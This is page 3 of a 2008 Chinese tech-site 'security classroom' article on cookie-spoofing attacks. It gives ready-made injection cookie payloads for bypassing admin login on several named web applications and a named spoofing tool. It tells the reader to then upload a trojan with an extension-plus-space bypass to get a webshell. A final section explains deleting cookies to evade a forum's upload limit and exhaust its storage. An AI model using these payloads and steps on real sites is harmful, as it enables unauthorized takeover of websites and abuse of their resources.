热点推荐
ZOL首页 > 企业安全 > 安全 > 行业新闻 >

利用Cookie欺骗攻击网站

安全课堂:Cookie欺骗攻击方法大揭密

CNET中国·ZOL 作者:中关村在线 张齐 【原创】 2008年11月25日 16:55 评论

  
    1.利用Cookie欺骗攻击网站

    偷到网站管理员Cookie后,就能利用Cookie欺骗攻击该站了,方法是:打开要攻击站后台管理页面,用“老兵Cookie欺骗工具”向该站服务器提交管理员Cookie,这样即可冒充管理员绕过密码验证登入后台,然后再通过后台的上传功能上传木马拿下Webshell,下面我们以入侵“讯时管理系统”网站为例,介绍操作步骤。

  用“讯时管理系统”代码建的网站有Cookie欺骗漏洞,打开“桂林老兵Cookies的欺骗工具”,在address栏中输入该站管理员登录页地址,尝试使用以下两个Cookies进行注入:

admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd或者

admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd%27or%27%3d%27or%27='or'='or'

  点击“桂林老兵Cookies的欺骗工具”工具栏上的黄色小锁按钮,把以上2个Cookies分别复制到Cookies框中,再点击右边的“连接”按钮,看能否直接进入后台登录页面,如果能进入,说明该Cookie注入获得成功;例如我们将admindj=1;adminuser=%27or%27%3d%27or%27;adminpass=21232f297a5dfd%27or%27%3d%27or%27='or'='or'粘贴到Cookies框中,点右边的“连接”按钮,发现成功以'or'='or'身份登入该站后台管理系统,最后你可以传马拿下该站。
  
  以下是Cookie欺骗攻击网站案例。

    网站程序名
管理员登录页地址
攻击时使用的Cookies
LeadBBS V3.14 美化插件版
http://127.0.0.1/bbs/manage/
gbtoyAtBD=0; path=/ASPSESSIONIDAQDRRDBD=DMMBDEPBNOGCKDGKBKEHGHAN; path=/gbtoyTime=2005%2D3%2D25+19%3A48%3A19; path=/gbtoy=pass=111222333&user=%B0%D7%CC%EC%B5%C4%C3%A8; path=/

    修改以上Cookies ,user=后面是会员ID,把总斑竹的ID换上去;冒充总斑竹登入后台后,在上传文件参数里添加.asp文件(在.asp后多加一个空格),上传木马时也要在扩展名后多打一个空格。
JIMMY中文站留言簿 v1.08
http://127.0.0.1/JIMMY/admin-index.asp
ASPSESSIONIDSQSRTSDC=DMJDAGLBOJNGBIGJPJAHIPOA; lunjilyb=randomid=12&password=jkh&username=jkh
商贸通2006地方门户版系统
http://127.0.0.1/admin/manage.asp
adminID=5;admin=admin;adminflag=1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1


    2.利用Cookie欺骗实现无限上传

  在百度或GOOGLE中搜索“动网论坛”找到一个动网论坛,打开该论坛注册一个会员名,随之你的硬盘上就会生成一个Cookie文件,以后登录论坛后只能上传5个文件,如果你想上传无限个文件,可以删除本地硬盘中的Cookie,因为会员上传文件的数量保存在Cookie中,删除之即可重新上传5个文件,操作步骤:

  启动IE,点击菜单“工具”/Internet选项,在“常规”选项卡中点“删除Cookies”,删除本地Cookie,然后刷新论坛,此时会看到你的登录无效、需要重新登录;接下来重新登录,然后你又可以再上传5个文件了,如此循环进行删除Cookie、上传文件操作,这样即可实现无限上传,估计要不了多久论坛空间就会被你撑破的!
  

查看本文作者 张齐 的其他文章>>
给文章打分 5分为满分(共0人参与) 查看排行>>
上一页 1 2 3 
本文导航
  • 第3页:利用Cookie欺骗攻击网站
频道热词:云计算  服务器   无线路由器  
视觉焦点
企业安全安全热点
排行 文章标题
TOP10周热门硬盘录像机排行榜
  • 热门
  • 新品
查看完整榜单>>